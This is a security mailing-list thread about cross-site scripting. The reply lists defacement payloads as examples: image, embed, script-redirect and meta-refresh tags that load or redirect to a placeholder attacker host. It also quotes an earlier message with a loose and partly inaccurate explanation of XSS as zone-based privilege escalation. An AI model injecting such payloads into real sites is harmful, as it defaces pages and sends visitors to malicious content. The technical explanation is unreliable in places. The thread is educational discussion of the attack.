Hi, Further level of XSS........
Q. What can be done with XSS? Q. How severe can XSS effect? The below inputs gives us a clarity what actually XSS is worth of!!!!! Checkout the Principle methods of Defacing using XSS: Defacement using Image: <IMG SRC="http://attackersite.com/malicious.png";> Defacement using a Flash Video: <EMBED SRC="http://attackersite.com/malicious.swf"; Defacement using Redirection to attackers Page: <script>window.open( "http://www.attackersite.com/malicious.html"; )</ script> Also: <meta http-equiv="refresh" content="0; url=http://attackersite.com/ malicious.html" /> Now, after going thru the above inputs we can understand how severe its effect can be. As an conclusion, XSS can compromise your system and also turnup to be a zombie. ***Please quote your inputs to have more elaborated and different ways to hit XSS. Regards, 0xN41K On May 12, 7:38 am, N41K <[email protected]> wrote: > Hi, > > From today onwards we are going to have Chapters for Application > Security. Hope every one will put there expertise and make this > Chapter a fully informative. > > Lets, GoAhead with XSS (Cross Site Scripting) > > Cross Site Scripting is a browser exploit taking advantage of a > vulnerability within a zone-based security solution. > The attack allows content (scripts) in unprivileged zones to be > executed with the permissions of a privileged zone - i.e. > a privilege escalation within the client (web browser) executing the > script. > > The attack can occur on: > > * a web browser (HTTP Client) vulnerability which under some > conditions allows content (scripts) > to be executed with the permissions of a higher privileged > zone(Administrator). > > * a web browser configuration error; unsafe sites listed in > privileged zones. > > * a cross-site scripting vulnerability(from Web Application) > within a privileged zone > > The common attack scenario involves two steps: > i. To use XSS vulnerability and execute scripts within a > privileged Zone. The Script may be any JS(JavaScript) which > performs some malicious action. > ii. Hit the vulnerability using ActiveX components( PC gets > Compromised). > > Such Vulnerabilities has been exploited and silently installed various > MALWARES ( such as Remote control Software, Worms, Viruses, Trojans, > Keyloggers, etc..) > > All such things happens when a user Browses a malicious Web Page. > > Finally, Use a Safer Web Browser and Surf a Safer Web Site. > > *** If any one would like to add points for this topic, All are > welcome. > > Regards, > 0xN41K > > -- > You received this message because you are subscribed to the Google Groups > "nforceit" group. > To post to this group, send an email to [email protected]. > To unsubscribe from this group, send email to > [email protected]. > For more options, visit this group > athttp://groups.google.com/group/nforceit?hl=en-GB. -- You received this message because you are subscribed to the Google Groups "nforceit" group. To post to this group, send an email to [email protected]. To unsubscribe from this group, send email to [email protected]. For more options, visit this group at http://groups.google.com/group/nforceit?hl=en-GB.
![http://attackersite.com/malicious.png"](http://attackersite.com/malicious.png"){kind=link}